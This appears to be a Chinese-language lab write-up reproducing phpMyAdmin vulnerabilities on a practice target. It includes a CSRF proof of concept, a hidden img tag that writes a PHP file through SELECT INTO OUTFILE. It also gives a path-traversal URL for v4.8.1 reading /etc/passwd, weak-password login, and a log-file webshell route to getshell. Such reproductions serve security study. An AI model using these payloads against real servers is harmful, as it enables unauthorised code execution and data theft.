phpMyAdmin 漏洞复现

0X01 phpMyAdmin 4.7.x CSRF 复现

此实验最好使用火狐浏览器进行复现，因为Chrome自带站点隔离的安全机制，对该漏洞复现有一定的影响。

进入phpmyadmin管理页面，需登录

该版本pma存在CSRF漏洞，攻击者可以通过诱导管理员访问恶意页面，悄无声息地执行任意SQL语句。因为我们扮演的便是管理员角色，所以直接访问本地构造好的恶意页面（下方给出POC）：

根据我们在poc中设定好的文件写入位置（目前只赋权给了poc中地址），访问php文件：

可见成功运行了恶意代码，写入了测试文件。

poc：

<p>Hello World</p>
<img src="此处为pma靶场网址/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/usr/share/nginx/html/[自定义名称，谨防重复].php';" style="display:none;" />

0x02 phpmyadmin v4.8.1 后台getshell

使用一波phpmyadmin的弱口令，root/123456成功登进后台

访问：
http://[靶场url]:81/index.php?target=db_datadict.php%253f/../../../../../../../../../etc/passwd

利用方式也比较简单，可以执行一下 SELECT ‘<?php phpinfo()?>’;

到phpmyadmin后台后，getshell方法还很多，比如利用改变写入的日志的路径，写入我们的一句话木马，
首先呢，介绍两个MySQL全局变量（general_log、general_log file）

• general log 指的是日志保存状态，一共有两个值（ON/OFF）ON代表开启 OFF代表关闭。
• general log file 指的是日志的保存路径

http://[靶场url]:81/index.php?target=db_datadict.php%253f/../../../../../../../../..//var/lib/mysql/eaeaef53e506.log

成功getshell。